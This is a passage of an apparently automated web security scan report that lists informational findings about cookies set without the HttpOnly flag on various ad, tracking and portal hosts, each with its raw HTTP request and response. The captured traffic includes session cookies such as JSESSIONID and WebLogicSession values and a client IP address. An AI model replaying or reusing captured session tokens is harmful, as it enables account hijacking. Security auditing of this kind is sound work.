Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1840
Connection: keep-alive
Set-Cookie: p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C.......................

............................... "..".......C.....................................................................2.2.................................
...[SNIP]...

16.153. http://r2.mail.ru/b13061099.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13061099.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13061099.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 3520
Connection: keep-alive
Set-Cookie: p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<.........R.u.s.s.i.a.n. .P.r.e.s.i.d.e.n.t. .D.m.i.t.r.y. .M.e.d.v.e.d.e.v. .i.s. .s.e.e.n. .a.g.a.i.n.s.t. .t.h.e. .b.a.c.k.g.r.o.u.n.d. .o.f. .R.u.s.s.i.a.'.s. .
...[SNIP]...

16.154. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741244306/rexdot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741244306/rexdot.gif?l=11&id=dv1K38epj5OVvUz_k_bVXZdS..OUmvCYJk0brLMVk1z.X7&tz=300&href=http%3A//pretty.ru/&ref=&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gtestss=TyHLZcpeZ6QeXgn5D25OXPa7; Gdyn=KlS_MB9GvGQpqwo8SYS8RSpGLl2xMSy8rDOx5Rf1MG88inAs-QFjaGGM8GGaSbY3W5bQsj8GmbsxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:55 GMT
Expires: Sun, 24 Apr 2011 14:44:55 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;

16.155. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741312919/rexdot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741312919/rexdot.gif?l=11&id=16LgHadxo4kFfevqG4Osi_UTDmyR8tuASw2dzIE9wLz.x7&tz=300&href=http%3A//pda.loveplanet.ru/&ref=http%3A//my.webalta.ru/&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestss=4YEhxFlgK1uccYJIgsvm8f57; Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gdyn=KlGUSB9GvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REQ58k5vpXJc90jGFyFxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:52:49 GMT
Expires: Sun, 24 Apr 2011 14:52:49 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;

16.156. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSDaDyc4OZiB56AgTFzPHdGMAkgUIPg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 14:40:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 25-Apr-2011 14:40:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=772369&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...

16.157. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 25 Apr 2011 12:59:55 GMT
Server: Apache
Location: /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8
NS_RTIMER_COMPOSITE: 1229161202:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8


16.158. http://show.multiclick.ru/blank.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.multiclick.ru
Path:   /blank.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blank.php?place=2949&rnd=0.23312585408403952 HTTP/1.1
Host: show.multiclick.ru
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:52:42 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: mtclk=7972985092388468962; Expires=Sat, 22-Oct-2011 14:52:42 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 49

GIF89a...................!.......,........@..T..;

16.159. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303647928; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; cnsuser_id=3793874385

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=3793874385; expires=Wed, 25-Apr-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

16.160. http://storage.trafic.ro/js/trafic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storage.trafic.ro
Path:   /js/trafic.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/trafic.js HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:20:47 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:20:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro
Connection: close

t_js_dw_time=new Date().getTime();document.write('<scr' + 'ipt type="text/javascript" src="http://storage.trafic.ro/js/trafic.js?tk='+(Math.pow(10,16) * Math.random())+'&t_rid='+t_rid+'"></sc' + 'ript
...[SNIP]...

16.161. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.criticalwatch.com/vulnerability-management.aspx&i=12408 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Nov 2006 20:55:11 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
If-None-Match: "6e791f59414c71:40e"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; ASPSESSIONIDSATDRRCT=HPHILLICKDBELBOMJPJGMDEB

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 12:52:31 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

16.162. http://top5.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top5.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=110605;js=13;r=;j=true;s=1920*1200;d=16;rand=0.07091198652051389 HTTP/1.1
Host: top5.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:48:03 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

16.163. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
Origin: http://webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 4036

q=%3Ca%20i%3D0%3E%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%3C%2Fa%3E%3Ca%20i%3D1%3E%D0%9D%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8%3C%2Fa%3E%3Ca%20i%3D2%3E%D0%90%D0%B2%D1%82%D0%BE%3C%2Fa%3E%3Ca%20i%3D3%3E%D0%9A%D0%B8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:55 GMT
Expires: Mon, 25 Apr 2011 14:48:55 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=5273502baf452368:TM=1303742935:LM=1303742935:S=EXx_U-Oas8EoHHIY; expires=Wed, 24-Apr-2013 14:48:55 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1713

["\x3ca i=0\x3eSearch\x3c/a\x3e \x3ca i=1\x3eNews\x3c/a\x3e \x3ca i=2\x3eAuto\x3c/a\x3e \x3ca i=3\x3eMovies\x3c/a\x3e \x3ca i=4\x3eWeather\x3c/a\x3e \x3ca i=5\x3eGames\x3c/a\x3e","My Page","All Ads","
...[SNIP]...

16.164. http://vkontakte.ru/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vkontakte.ru
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?act=slogin&al_frame=1&auto=1 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:24:44 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-control: no-store
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: remixmid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixsid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixgid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixemail=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixpass=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Vary: Accept-Encoding
Content-Length: 540

<script type="text/javascript">
var _ua = navigator.userAgent;
var locDomain = 'vkontakte.ru'.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain !=
...[SNIP]...

16.165. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif?&dcsdat=1303733460071&dcssip=www.gartner.com&dcsuri=/DisplayDocument&dcsqry=%3Fdoc_cd=127481&WT.seg_2=000000-00&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Improve%20IT%20Security%20With%20Vulnerability%20Management&WT.js=Yes&WT.jv=1.5&WT.bs=1034x978&WT.fi=Yes&WT.fv=10.2&WT.cg_n=Document%20Display&WT.pn_sku=480703&WT.vt_f_tlh=1303732853&WT.vt_sid=173.193.214.243-1722167968.30147392.1303732853510&WT.co_f=173.193.214.243-1722167968.30147392&WTclass=FullFree&WTdoc_cd-title=127481:Improve%20IT%20Security%20With%20Vulnerability%20Management&WTdocrole=IT%20Infrastructure%20%26%20Operations;%20Security%20%26%20Risk%20Management;%20Enterprise%20Architecture;%20Application%20Management HTTP/1.1
Host: wtssdc.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-1722327968.30147392; WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAGpitU1qYrVNAQAAAAEAAABqYrVNamK1TQAAAAA-; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733460073:ss=1303732853510

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAMhktU1qYrVNAQAAAAEAAADIZLVNamK1TQEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3Mzky; path=/; expires=Thu, 22-Apr-2021 12:10:48 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 25 Apr 2011 12:10:48 GMT
Connection: close

GIF89a.............!.......,...........D..;

16.166. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
